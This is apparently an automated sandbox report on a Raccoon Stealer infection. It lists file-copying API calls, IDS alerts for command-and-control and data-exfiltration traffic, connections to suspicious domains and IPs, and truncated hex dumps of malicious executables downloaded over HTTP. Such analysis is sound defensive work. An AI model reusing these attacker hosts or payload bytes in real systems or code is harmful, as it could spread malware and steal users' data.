Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\9779.exe | Code function: 22_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                      Networking:

                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49897 -> 185.163.204.24:80
                      Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.3:49929 -> 74.201.28.62:80
                      Source: Traffic | Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.3:49934 -> 185.163.204.24:80
                      Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49934 -> 185.163.204.24:80
                      Source: Traffic | Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.3:49897 -> 185.163.204.24:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exe | Domain query: unicupload.top
                      Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exe | Domain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\explorer.exe | Domain query: goo.su
                      Source: C:\Windows\explorer.exe | Domain query: transfer.sh
                      Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
                      Source: global traffic | HTTP traffic detected: GET /book/KB5009812.png HTTP/1.1; Host: 74.201.28.62; Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:04 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 
58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:07 GMTContent-Type: application/x-msdos-programContent-Length: 320000Connection: closeLast-Modified: Fri, 14 Jan 2022 19:23:02 GMTETag: "4e200-5d58fbb413a4c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 b5 a3 2e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 e4 03 00 00 ac 11 00 00 00 00 00 90 b2 01 00 00 10 00 00 00 00 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 15 00 00 04 00 00 09 69 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 df 03 00 50 00 00 00 00 00 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 15 00 00 1e 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6e e3 03 00 00 10 00 00 00 e4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 00 04 00 00 18 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 6d 65 6e 65 64 05 00 00 00 00 d0 14 00 
00 02 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 6c 6f 68 65 00 ea 00 00 00 00 e0 14 00 00 02 00 00 00 02 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 75 74 6f 68 6f 78 93 0d 00 00 00 f0 14 00 00 0e 00 00 00 04 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 00 15 00 00 88 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5a 46 00 00 00 90 15 00 00 48 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:11 GMTContent-Type: application/x-msdos-programContent-Length: 324608Connection: closeLast-Modified: Fri, 14 Jan 2022 19:23:02 GMTETag: "4f400-5d58fbb461c4c"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d 1f 39 8a 29 7e 57 d9 29 7e 57 d9 29 7e 57 d9 37 2c c2 d9 33 7e 57 d9 37 2c d4 d9 af 7e 57 d9 0e b8 2c d9 2e 7e 57 d9 29 7e 56 d9 c9 7e 57 d9 37 2c d3 d9 13 7e 57 d9 37 2c c3 d9 28 7e 57 d9 37 2c c6 d9 28 7e 57 d9 52 69 63 68 29 7e 57 d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 6f ac 7d 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 f6 03 00 00 ac 11 00 00 00 00 00 50 c3 01 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 15 00 00 04 00 00 5b e9 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 f0 03 00 50 00 00 00 00 10 15 00 28 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 f8 1d 00 00 a0 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2e f4 03 00 00 10 00 00 00 f6 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 88 c9 10 00 00 10 04 00 00 18 00 00 00 fa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 7a 69 63 00 00 00 00 05 00 00 00 00 e0 14 00 
00 02 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 77 75 76 75 68 75 73 ea 00 00 00 00 f0 14 00 00 02 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6a 75 66 6f 74 00 00 93 0d 00 00 00 00 15 00 00 0e 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 87 00 00 00 10 15 00 00 88 00 00 00 24 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 64 46 00 00 00 a0 15 00 00 48 00 00 00 ac 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:23:44 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 19:23:49 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 17:15:09 GMTETag: "6ff1c7-5d58df1eec44d"Accept-Ranges: bytesContent-Length: 7336391Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 58 b0 38 63 39 de 6b 63 39 de 6b 63 39 de 6b 77 52 da 6a 68 39 de 6b 77 52 dd 6a 64 39 de 6b 77 52 db 6a df 39 de 6b 05 56 23 6b 67 39 de 6b 31 4c db 6a 45 39 de 6b 31 4c da 6a 72 39 de 6b 31 4c dd 6a 6a 39 de 6b 77 52 df 6a 68 39 de 6b 63 39 df 6b e4 39 de 6b d9 4c da 6a 70 39 de 6b d9 4c dc 6a 62 39 de 6b 52 69 63 68 63 39 de 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 51 ae e1 61 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 1d 00 36 02 00 00 54 01 00 00 00 00 00 c8 a8 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 04 00 00 04 00 00 12 0b 70 00 02 00 60 81 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 5b 03 00 78 00 00 00 00 b0 04 00 e3 05 00 00 00 80 04 00 e8 1d 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 48 07 00 00 20 39 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 39 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 50 02 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 35 02 00 00 10 00 00 00 36 02 00 00 04 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 98 18 01 00 00 50 02 00 00 1a 01 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 03 01 00 00 70 03 00 00 0c 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 e8 1d 00 00 00 80 04 00 00 1e 00 00 00 60 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 5f 52 44 41 54 41 00 00 f4 00 00 00 00 a0 04 00 00 02 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e3 05 00 00 00 b0 04 00 00 06 00 00 00 80 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 07 00 00 00 c0 04 00 00 08 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Fri, 14 Jan 2022 18:57:27 GMTAccept-Ranges: bytesETag: "9bd1193789d81:0"Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Fri, 14 Jan 2022 19:23:57 GMTContent-Length: 54272Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 76 4c 96 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 16 00 00 00 bc 00 00 00 00 00 00 12 35 00 00 00 20 00 00 00 40 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 34 00 00 4f 00 00 00 00 40 00 00 5c b9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 a4 34 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 15 00 00 00 20 00 00 00 16 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 5c b9 00 00 00 40 00 00 00 ba 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 34 00 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 23 00 00 60 10 00 00 01 00 00 00 01 00 00 06 ec 33 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 3a 00 00 00 01 00 00 11 00 28 13 00 00 0a 0b 12 01 28 14 00 00 0a 28 15 00 00 0a 00 73 05 00 00 06 0a 06 6f 04 00 00 06 00 28 13 00 00 0a 0b 12 01 28 14 00 00 0a 28 15 00 00 0a 00 16 0c 2b 00 08 2a 22 02 28 16 00 00 0a 00 2a 00 1b 30 06 00 ae 00 00 00 02 00 00 11 00 d0 20 00 00 01 28 17 00 00 0a 72 01 00 00 70 17 8d 14 00 00 01 25 16 d0 22 00 00 01 28 17 00 00 0a a2 28 18 00 00 0a 14 17 8d 10 00 00 01 25 16 20 20 4e 00 00 8c 22 00 00 01 a2 6f 19 00 00 0a 26 00 20 00 0c 00 00 28 1a 00 00 0a 00 00 de 05 26 00 00 de 00 d0 26 00 00 01 28 17 00 00 0a 72 0d 00 00 70 72 35 00 00 70 72 39 00 00 70 28 1b 00 00 0a 17 8d 14 00 00 01 25 16 d0 27 00 00 01 28 17 00 00 0a a2 28 18 00 00 0a 73 1c 00 00 0a 17 8d 10 00 00 01 25 16 72 3b 00 00 70 a2 6f 19 00 00 0a 74 01 00 00 1b 0a 2b 00 06 2a 00 00 01 10 00 00 00 00 42 00 0f 51 00 05 10 00 00 01 1b 30 03 00 37 01 00 00 03 00 00 11 00 02 28 03 00 00 06 0a 06 14 fe 03 13 04 11 04 2c 0b 06 16 06 8e
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 19:24:02 GMTContent-Type: application/x-msdos-programContent-Length: 905216Connection: closeLast-Modified: Thu, 13 Jan 2022 15:53:07 GMTETag: "dd000-5d578aeb4049d"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b cf 9c fb cf ae f2 a8 cf ae f2 a8 cf ae f2 a8 d1 fc 67 a8 d3 ae f2 a8 d1 fc 71 a8 49 ae f2 a8 d1 fc 76 a8 e1 ae f2 a8 e8 68 89 a8 cc ae f2 a8 cf ae f3 a8 45 ae f2 a8 d1 fc 78 a8 ce ae f2 a8 d1 fc 66 a8 ce ae f2 a8 d1 fc 63 a8 ce ae f2 a8 52 69 63 68 cf ae f2 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cf 5b b6 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 20 01 00 00 32 0d 00 00 00 00 00 00 30 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 e4 71 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 66 01 00 28 00 00 00 00 70 0d 00 20 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 